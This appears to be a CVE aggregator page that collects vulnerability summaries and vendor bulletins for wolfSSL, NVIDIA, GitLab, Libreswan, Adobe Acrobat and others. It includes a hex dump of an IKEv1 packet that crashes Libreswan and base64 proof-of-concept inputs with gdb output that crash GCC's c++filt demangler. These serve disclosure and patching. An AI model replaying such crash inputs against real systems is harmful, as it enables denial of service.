wolfSSL 5.x before 5.1.1 uses non-random IV values in certain situations. This affects connections (without AEAD) using AES-CBC or DES3 with TLS 1.1 or 1.2 or DTLS 1.1 or 1.2. This occurs because of misplaced memory initialization in BuildMessage in internal.c.

CVE-2022-23408: wolfssl/ChangeLog.md at master · wolfSSL/wolfssl

NVIDIA Linux kernel distributions contain a vulnerability in nvmap NVGPU_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, where improper access control may lead to code execution, compromised integrity, or denial of service.

**Details**

This section summarizes the potential impact that this security update addresses. Descriptions use CWE™, and base scores and vectors use CVSS V3.1 standards.

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2021‑1106

NVIDIA Linux kernel distributions contain a vulnerability in `nvmap`, where writes may be allowed to read-only buffers, which may result in escalation of privileges, denial of service, information disclosure, or data tampering.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2021‑1107

NVIDIA Linux kernel distributions contain a vulnerability in `nvmap` `NVMAP_IOC_WRITE*` paths, where improper access controls may lead to code execution, denial of service, or compromised integrity of system components.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2021‑34401

NVIDIA Linux kernel distributions contain a vulnerability in `nvmap` `NVGPU_IOCTL_CHANNEL_SET_ERROR_NOTIFIER`, where improper access control may lead to code execution, compromised integrity, or denial of service.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2021‑1108

NVIDIA Linux kernel distributions contain a vulnerability in FuSa Capture (VI/ISP), where integer underflow caused by lack of input validation may lead to complete denial of service, partial integrity, and serious confidentiality loss for all processes in the system.

7.3

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H

CVE‑2021‑34402

NVIDIA Tegra kernel driver contains a vulnerability in NVIDIA NVDEC, where a user with high privileges might be able to read from or write to a memory location that is outside the intended boundary of the buffer, which may lead to denial of service, Information disclosure, loss of Integrity, or possible escalation of privileges.

6.7

AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2021‑34403

NVIDIA Linux distributions contain a vulnerability in nvmap ioctl, which allows any user with a local account to exploit a use-after-free condition, leading to code privilege escalation, loss of confidentiality and integrity, or denial of service.

7.8

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE‑2021‑34404

Android images for T210 provided by NVIDIA contain a vulnerability in BROM, where failure to limit access to AHB-DMA when BROM fails may allow an unprivileged attacker with physical access to cause denial of service or impact integrity and confidentiality beyond the security scope of BROM.

7.1

AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CVE‑2021‑34405

NVIDIA Linux distributions contain a vulnerability in TrustZone’s `TEE_Malloc` function, where an unchecked return value causing a null pointer dereference may lead to denial of service.

5.5

AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE‑2021‑1112

NVIDIA Linux kernel distributions contain a vulnerability in `nvmap`, where a null pointer dereference may lead to denial of service.

5.5

AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE‑2021‑34406

NVIDIA Tegra kernel driver contains a vulnerability in NVHost, where a specific race condition can lead to a null pointer dereference, which may lead to a system reboot.

4.7

AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

SHIELD TV update includes Android™ Security Patch level **2021-09-05**. For more information about what is included in Android security patch levels, refer to the Android Security Bulletins.

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends evaluating the risk to your specific configuration.

**Security Updates**

The following table lists the NVIDIA software products affected, versions affected, and the updated version that includes this security update. Download the update through Settings\>About\>System update.

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

SHIELD TV

Android-P

Shield Experience prior to SE 9.0

Shield Experience Upgrade SE 9.0

**Note:**

*   Earlier releases of this product are also affected. If you are using an earlier release, upgrade to the latest release.

**Mitigations**

See Security Updates for the version to install.

**Acknowledgements**

CVE‑2021‑34406: NVIDIA thanks Billy Laws for reporting this issue.

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

January 12, 2022

Initial release

**Support**

If you have any questions about this Security Bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2021-34401: Security Bulletin: NVIDIA SHIELD TV - January 2022

An issue has been discovered in GitLab affecting all versions starting from 12.10 before 14.4.5, all versions starting from 14.5.0 before 14.5.3, all versions starting from 14.6.0 before 14.6.2. GitLab was not correctly handling requests to delete existing packages which could result in a Denial of Service under specific conditions.

CVE-2022-0151

Mattermost 6.2 and earlier fails to sufficiently process a specifically crafted GIF file when it is uploaded while drafting a post, which allows authenticated users to cause resource exhaustion while processing the file, resulting in server-side Denial of Service.

CVE-2021-37865

A denial of service vulnerability in GitLab CE/EE affecting all versions starting from 12.0 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows low-privileged users to bypass file size limits in the NPM package repository to potentially cause denial of service.

CVE-2021-39942

Pexip Infinity before 26.2 allows temporary remote Denial of Service (abort) because of missing call-setup input validation.

CVE-2021-42555: Pexip security bulletins | Pexip Infinity Docs

Libreswan 4.2 through 4.5 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted IKEv1 packet because pluto/ikev1.c wrongly expects that a state object exists. This is fixed in 4.6.

After setting up plutodebug=base, I got the packet which may cause core dump when ikev1 is not accept

_Dec 21 02:43:35 localhost pluto\[2787\]: | \*received 204 bytes from 101.4.62.36:43357 on eth0 192.168.99.102:500 using UDP  
Dec 21 02:43:35 localhost pluto\[2787\]: | 31 27 fc b0 38 10 9e 89 00 00 00 00 00 00 00 00 1'..8...........  
Dec 21 02:43:35 localhost pluto\[2787\]: | 01 10 02 00 00 00 00 00 00 00 00 cc 0d 00 00 5c ...............  
Dec 21 02:43:35 localhost pluto\[2787\]: | 00 00 00 01 00 00 00 01 00 00 00 50 01 01 00 02 ...........P....  
Dec 21 02:43:35 localhost pluto\[2787\]: | 03 00 00 24 01 01 00 00 80 01 00 05 80 02 00 02 ...$............  
Dec 21 02:43:35 localhost pluto\[2787\]: | 80 04 00 02 80 03 00 03 80 0b 00 01 00 0c 00 04 ................  
Dec 21 02:43:35 localhost pluto\[2787\]: | 00 00 0e 10 31 27 fc b0 38 10 9e 89 00 00 00 00 ....1'..8.......  
Dec 21 02:43:35 localhost pluto\[2787\]: | 00 00 00 00 01 10 02 00 00 00 00 00 00 00 00 cc ................  
Dec 21 02:43:35 localhost pluto\[2787\]: | 0d 00 00 5c 00 00 00 01 00 00 00 01 00 00 00 50 ..............P  
Dec 21 02:43:35 localhost pluto\[2787\]: | 01 01 00 02 03 00 00 24 01 01 00 00 80 01 00 05 .......$........  
Dec 21 02:43:35 localhost pluto\[2787\]: | 80 02 00 02 80 04 00 02 80 03 00 03 80 0b 00 01 ................  
Dec 21 02:43:35 localhost pluto\[2787\]: | 00 0c 00 04 00 00 0e 10 00 00 00 24 02 01 00 00 ...........$....  
Dec 21 02:43:35 localhost pluto\[2787\]: | 80 01 00 05 80 02 00 01 80 04 00 02 80 03 00 03 ................  
Dec 21 02:43:35 localhost pluto\[2787\]: | 80 0b 00 01 00 0c 00 04 00 00 0e 10 ............  
Dec 21 02:43:35 localhost pluto\[2787\]: | \*\*parse ISAKMP Message:  
Dec 21 02:43:35 localhost pluto\[2787\]: | initiator SPI: 31 27 fc b0 38 10 9e 89  
Dec 21 02:43:35 localhost pluto\[2787\]: | responder SPI: 00 00 00 00 00 00 00 00  
Dec 21 02:43:35 localhost pluto\[2787\]: | next payload type: ISAKMP\_NEXT\_SA (0x1)  
Dec 21 02:43:35 localhost pluto\[2787\]: | ISAKMP version: ISAKMP Version 1.0 (rfc2407) (0x10)  
Dec 21 02:43:35 localhost pluto\[2787\]: | exchange type: ISAKMP\_XCHG\_IDPROT (0x2)  
Dec 21 02:43:35 localhost pluto\[2787\]: | flags: none (0x0)  
Dec 21 02:43:35 localhost pluto\[2787\]: | Message ID: 0 (00 00 00 00)  
Dec 21 02:43:35 localhost pluto\[2787\]: | length: 204 (00 00 00 cc)  
Dec 21 02:43:35 localhost pluto\[2787\]: | processing version=1.0 packet with exchange type=ISAKMP\_XCHG\_IDPROT (2)  
Dec 21 02:43:35 localhost pluto\[2787\]: | State DB: IKEv1 state not found (find\_state\_ikev1\_init)  
Dec 21 02:43:35 localhost pluto\[2787\]: | #null state always idle  
Dec 21 02:43:35 localhost pluto\[2787\]: | got payload 0x2 (ISAKMP\_NEXT\_SA) needed: 0x2 opt: 0x2080  
Dec 21 02:43:35 localhost pluto\[2787\]: | \*\*\*parse ISAKMP Security Association Payload:  
Dec 21 02:43:35 localhost pluto\[2787\]: | next payload type: ISAKMP\_NEXT\_VID (0xd)  
Dec 21 02:43:35 localhost pluto\[2787\]: | length: 92 (00 5c)  
Dec 21 02:43:35 localhost pluto\[2787\]: | DOI: ISAKMP\_DOI\_IPSEC (0x1)  
Dec 21 02:43:35 localhost pluto\[2787\]: | got payload 0x2000 (ISAKMP\_NEXT\_VID) needed: 0x0 opt: 0x2080  
Dec 21 02:43:36 localhost systemd\[1\]: ipsec.service: Main process exited, code=dumped, status=11/SEGV  
Dec 21 02:43:36 localhost systemd\[1\]: ipsec.service: Failed with result 'core-dump'.  
Dec 21 02:43:36 localhost systemd\[1\]: ipsec.service: Consumed 2.706s CPU time.  
Dec 21 02:43:36 localhost systemd\[1\]: ipsec.service: Scheduled restart job, restart counter is at 2.  
Dec 21 02:43:36 localhost systemd\[1\]: Stopped Internet Key Exchange (IKE) Protocol Daemon for IPsec.  
Dec 21 02:43:36 localhost systemd\[1\]: ipsec.service: Consumed 2.706s CPU time.  
Dec 21 02:43:36 localhost systemd\[1\]: Starting Internet Key Exchange (IKE) Protocol Daemon for IPsec..._

normally after core dump the IPsec service restart but unfortunately the original xfrm interface was not clear and cause below:

_Dec 21 02:43:38 localhost pluto\[3815\]: "ikev2-cp": conflict ipsec1 already exist cannot support xfrm-interface. May be leftover from previous pluto?  
Dec 21 02:43:38 localhost pluto\[3815\]: "ikev2-cp": failed to add connection: ipsec-interface=1 not supported. device name conflict in xfrm\_iface\_supported()_

This cause the VPN server not accept any connection request and need manual restart the service.

Any workaround?

CVE-2022-23094: xfrm interface ipsec1 exist after core dump and blocking restart of ipsec service clean · Issue #585 · libreswan/libreswan

In SAP NetWeaver AS for ABAP and ABAP Platform - versions 701, 702, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 756, 786, an attacker authenticated as a regular user can use the S/4 Hana dashboard to reveal systems and services which they would not normally be allowed to see. No information alteration or denial of service is possible.

CVE-2021-42067

Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader  | APSB22-01

**Bulletin ID**

**Date Published**

**Priority**

APSB22-01

January 11, 2022

2

**Summary**

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address  multiple critical, important and moderate vulnerabilities. Successful exploitation could lead to arbitrary code execution, memory leak, application denial of service,  security feature bypass and privilege escalation. 

**Affected Versions**

**Product**

**Track**

**Affected Versions**

**Platform**

Acrobat DC 

Continuous 

21.007.20099 and earlier versions  

Windows

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

Windows

Acrobat DC 

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat Reader DC

Continuous 

21.007.20099 and earlier versions

macOS

Acrobat 2020  

Classic 2020             

20.004.30017 and earlier versions  

Windows & macOS  

Acrobat Reader 2020  

Classic 2020             

20.004.30017 and earlier versions   

Windows & macOS  

Acrobat 2017

Classic 2017

17.011.30204  and earlier versions            

Windows & macOS  

Acrobat Reader 2017

Classic 2017

17.011.30204  and earlier versions        

Windows & macOS  

For questions regarding Acrobat DC, please visit the Acrobat DC FAQ page. 

**Solution**

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Product**

**Track**

**Updated Versions**

**Platform**

**Priority Rating**

**Availability**

Acrobat DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat Reader DC

Continuous

21.011.20039  

Windows and macOS

2

Release Notes     

Acrobat 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat Reader 2020  

Classic 2020             

20.004.30020  

Windows and macOS       

2

Release Notes     

Acrobat 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

Acrobat Reader 2017

Classic 2017

17.011.30207  

Windows and macOS

2

Release Notes     

**Vulnerability Details**

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVSS base score**

CVSS vector

**CVE Number**

Use After Free (CWE-416)

Arbitrary code execution 

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44701

Information Exposure (CWE-200)  

Privilege escalation

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44702

Stack-based Buffer Overflow (CWE-121)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44703

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44704

Access of Uninitialized Pointer (CWE-824)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44705

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44706

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44707

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44708

Heap-based Buffer Overflow (CWE-122)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44709

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44710

Integer Overflow or Wraparound (CWE-190)

Arbitrary code execution

Critical

7.8

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-44711

Improper Input Validation (CWE-20)

Application denial-of-service

Important

4.4

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L

CVE-2021-44712

Use After Free (CWE-416)

Application denial-of-service

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

CVE-2021-44713

Violation of Secure Design Principles (CWE-657)

Security feature bypass

Moderate

2.5

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44714

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44715

Information Exposure (CWE-200)  

Privilege escalation  

Moderate

3.1

CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N  

CVE-2021-44739

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44740

NULL Pointer Dereference (CWE-476)

Application denial-of-service

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

CVE-2021-44741

Out-of-bounds Read (CWE-125)

Memory Leak

Moderate

3.3

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-44742

Out-of-bounds Read (CWE-125)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45060

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45061

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45062

Use After Free (CWE-416)

Privilege escalation

Moderate

3.3

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N

CVE-2021-45063

Use After Free (CWE-416)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45064

Access of Memory Location After End of Buffer (CWE-788)

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

CVE-2021-45067

Out-of-bounds Write (CWE-787)

Arbitrary code execution

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2021-45068

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-24092  

Out-of-bounds Write (CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2022-24091

**Acknowledgements**

Adobe would like to thank the following for reporting these issues and for working with Adobe to help protect our customers:   

*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc working with Trend Micro Zero Day Initiative (CVE-2021-44701)
*   j00sean (j00sean) (CVE-2021-44702, CVE-2021-44739)
*   Kai Lu of Zscaler's ThreatLabz (CVE-2021-44703, CVE-2021-44708, CVE-2021-44709, CVE-2021-44740, CVE-2021-44741)
*   PangU via TianfuCup (CVE-2021-44704)
*   StakLeader via TianfuCup and Mat Powell of Trend Micro Zero Day Initiative (CVE-2021-44705)
*   bee13oy of Kunlun Lab via TianfuCup (CVE-2021-44706)
*   Vulnerability Research Institute Juvenile Via TianfuCup and Mat Powell of Trend Micro Zero Day Initiative  
    (CVE-2021-44707)
*   Jaewon Min and Aleksandar Nikolic of Cisco Talos (CVE-2021-44710, CVE-2021-44711)
*   Sanjeev Das (sd001) (CVE-2021-44712)  
    
*   Rocco Calvi (TecR0c) and Steven Seeley of Qihoo 360 (CVE-2021-44713, CVE-2021-44715)
*   chamal (chamal) (CVE-2021-44714)
*   fr0zenrain of Baidu Security (fr0zenrain) (CVE-2021-44742)  
    
*   Anonymous working with Trend Micro Zero Day Initiative (CVE-2021-45060, CVE-2021-45061, CVE-2021-45062, CVE-2021-45063; CVE-2021-45068, CVE-2021-45064)
*   Ashfaq Ansari and Krishnakant Patil - HackSys Inc (CVE-2021-45067)
*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-24092, CVE-2022-24091)

**Revisions:**

January 12, 2022: Updated acknowledgement for CVE-2021-44706

January 13, 2022: Updated acknowledgement for CVE-2021-45064, Updated CVE details for CVE-2021-44702 and CVE-2021-44739

January 17, 2022: Updated acknowledgement for CVE-2021-44706  
January 27th, 2022: Updated acknowledgment for CVE-2021-45067

March 16, 2022: Added CVE details for CVE-2022-24091 and CVE-2022-24092

March 24, 2022: Updated acknowledgements for CVE-2022-44705 and CVE-2022-44707

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2021-44705: Adobe Security Bulletin

GCC v12.0 was discovered to contain an uncontrolled recursion via the component libiberty/rust-demangle.c. This vulnerability allows attackers to cause a Denial of Service (DoS) by consuming excessive CPU and memory resources.

\# Uncontrolled Recursion in libiberty/rust-demangle.c

## Description

An Uncontrolled Recursion was discovered in libiberty/rust-demangle.c. The vulnerability could allow attackers to consume excessive resources such as CPU or memory.

\*\*version\*\*

gcc: ad6091d1b891cc8aeda27850c4035f9b6163dcb0

binutils: d16ce6240e556133549f4f69927eb99b28978af2

\*\*System information\*\*
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

## Proof of Concept

\*\*poc\*\*

\`\`\`
base64 poc
ZPGoqKioqKj6/ytu8rq7H9UdEJpfUkJfAKh//4ioqKioqKj//2EAAAAA//8AAAQFAG1Ycy8XABgAQgAS//9lP0BHcnJycotdJPMrXNNcfOJ6mgAAXCtmIEi3AAAQ
\`\`\`

\*\*command\*\*

\`\`\`
./c++filt < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
./c++filt < ./poc
\[1\]    881695 segmentation fault  ./c++filt < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
0x000055555564082d in demangle\_path (rdm=0x7fffffffe040, in\_value=in\_value@entry=1) at ./rust-demangle.c:769
769           backref = parse\_integer\_62 (rdm);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────────────
 RAX  0x0
 RBX  0x42
 RCX  0x2
 RDX  0x0
 RDI  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f42 /\* 'B\_' \*/
 RSI  0x55555564082a (demangle\_path+970) ◂— mov    rdi, rbp
 R8   0x555555696142 (mbuffer+2) ◂— 0x5f42 /\* 'B\_' \*/
 R9   0x555555666024 ◂— 0xfffda778fffda806
 R10  0x0
 R11  0x555555696140 (mbuffer) ◂— 0x5f42525f /\* '\_RB\_' \*/
 R12  0x1
 R13  0x5555556662a0 (\_sch\_istable) ◂— 0x2000200020802
 R14  0x55555564246b ◂— 0x69727473002e245f /\* '\_$.' \*/
 R15  0x555555696140 (mbuffer) ◂— 0x5f42525f /\* '\_RB\_' \*/
 RBP  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f42 /\* 'B\_' \*/
 RSP  0x7fffff7ff000 ◂— 0x0
 RIP  0x55555564082d (demangle\_path+973) ◂— call   0x55555563e360
──────────────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────────────
   0x55555564082a <demangle\_path+970>     mov    rdi, rbp
 ► 0x55555564082d <demangle\_path+973>     call   parse\_integer\_62                <parse\_integer\_62>
        rdi: 0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f42 /\* 'B\_' \*/

   0x555555640832 <demangle\_path+978>     mov    edx, dword ptr \[rbp + 0x2c\]
   0x555555640835 <demangle\_path+981>     test   edx, edx
   0x555555640837 <demangle\_path+983>     jne    demangle\_path+64                <demangle\_path+64>

   0x55555564083d <demangle\_path+989>     mov    rbx, qword ptr \[rbp + 0x20\]
   0x555555640841 <demangle\_path+993>     mov    qword ptr \[rbp + 0x20\], rax
   0x555555640845 <demangle\_path+997>     mov    esi, r12d
   0x555555640848 <demangle\_path+1000>    call   demangle\_path                <demangle\_path>

   0x55555564084d <demangle\_path+1005>    mov    qword ptr \[rbp + 0x20\], rbx
   0x555555640851 <demangle\_path+1009>    jmp    demangle\_path+64                <demangle\_path+64>
──────────────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────────────
In file: /home/aidai/fuzzing/binutils/binutils-gdb/libiberty/rust-demangle.c
   764           demangle\_generic\_arg (rdm);
   765         }
   766       PRINT (">");
   767       break;
   768     case 'B':
 ► 769       backref = parse\_integer\_62 (rdm);
   770       if (!rdm->skipping\_printing)
   771         {
   772           old\_next = rdm->next;
   773           rdm->next = backref;
   774           demangle\_path (rdm, in\_value);
──────────────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────────────
00:0000│ rsp 0x7fffff7ff000 ◂— 0x0
... ↓        6 skipped
07:0038│     0x7fffff7ff038 ◂— 0xb50269d9f4754500
────────────────────────────────────────────────────\[ BACKTRACE \]─────────────────────────────────────────────────────
 ► f 0   0x55555564082d demangle\_path+973
   f 1   0x55555564084d demangle\_path+1005
   f 2   0x55555564084d demangle\_path+1005
   f 3   0x55555564084d demangle\_path+1005
   f 4   0x55555564084d demangle\_path+1005
   f 5   0x55555564084d demangle\_path+1005
   f 6   0x55555564084d demangle\_path+1005
   f 7   0x55555564084d demangle\_path+1005
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
\`\`\`

\*\*poc2\*\*

\`\`\`
base64 poc
aUlaDwAAEGQ6YwAcAP9hAABaAAAAAAB/X1JZQl+DYQIMAABBPVuAAAAAACA6Ui44/zo6Ojr/Ojo6
Ojo6TzD9YhBP8QAAABAkTwBAYv///eAjABAkEBBcXFwQEFxcXDw=
\`\`\`

\*\*command\*\*

\`\`\`
./c++filt < ./poc
\`\`\`

\*\*Result\*\*

\`\`\`
\[1\]    1731144 segmentation fault  ./c++filt < ./poc
\`\`\`

\*\*gdb\*\*

\`\`\`
Program received signal SIGSEGV, Segmentation fault.
demangle\_type (rdm=0x7fffffffe040) at ./rust-demangle.c:866
866       basic = basic\_type (tag);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────\[ REGISTERS \]─────────────────────────────────────────────────────
 RAX  0x555555696142 (mbuffer+2) ◂— 0x5f4259 /\* 'YB\_' \*/
 RBX  0x555555665fd4 ◂— 0xfffd9f3ffffd9f68
 RCX  0x2
 RDX  0x1
 RDI  0x42
 RSI  0x3
 R8   0x555555665364 ◂— 0x3d2d00496d003c /\* '<' \*/
 R9   0x555555666024 ◂— 0xfffda778fffda806
 R10  0x0
 R11  0x7ffff7fa5be0 (main\_arena+96) —▸ 0x5555556b06c0 ◂— 0x0
 R12  0x0
 R13  0x42
 R14  0x0
 R15  0x555555696140 (mbuffer) ◂— 0x5f4259525f /\* '\_RYB\_' \*/
 RBP  0x7fffffffe040 —▸ 0x555555696142 (mbuffer+2) ◂— 0x5f4259 /\* 'YB\_' \*/
 RSP  0x7fffff7ff000 ◂— 0x0
 RIP  0x55555563fc9c (demangle\_type+476) ◂— call   0x55555563e7c0
──────────────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────────────
 ► 0x55555563fc9c <demangle\_type+476>    call   basic\_type                <basic\_type>
        rdi: 0x42

   0x55555563fca1 <demangle\_type+481>    mov    r12, rax
   0x55555563fca4 <demangle\_type+484>    test   rax, rax
   0x55555563fca7 <demangle\_type+487>    jne    demangle\_type+408                <demangle\_type+408>

   0x55555563fca9 <demangle\_type+489>    lea    eax, \[r13 - 0x41\]
   0x55555563fcad <demangle\_type+493>    cmp    al, 0x13
   0x55555563fcaf <demangle\_type+495>    ja     demangle\_type+96                <demangle\_type+96>

   0x55555563fcb5 <demangle\_type+501>    movzx  eax, al
   0x55555563fcb8 <demangle\_type+504>    movsxd rax, dword ptr \[rbx + rax\*4\]
   0x55555563fcbc <demangle\_type+508>    add    rax, rbx
   0x55555563fcbf <demangle\_type+511>    jmp    rax
──────────────────────────────────────────────────\[ SOURCE (CODE) \]───────────────────────────────────────────────────
In file: /home/aidai/fuzzing/binutils/binutils-gdb/libiberty/rust-demangle.c
   861   if (rdm->errored)
   862     return;
   863
   864   tag = next (rdm);
   865
 ► 866   basic = basic\_type (tag);
   867   if (basic)
   868     {
   869       PRINT (basic);
   870       return;
   871     }
──────────────────────────────────────────────────────\[ STACK \]───────────────────────────────────────────────────────
00:0000│ rsp 0x7fffff7ff000 ◂— 0x0
... ↓        4 skipped
05:0028│     0x7fffff7ff028 ◂— 0x1985771200307400
06:0030│     0x7fffff7ff030 ◂— 0x0
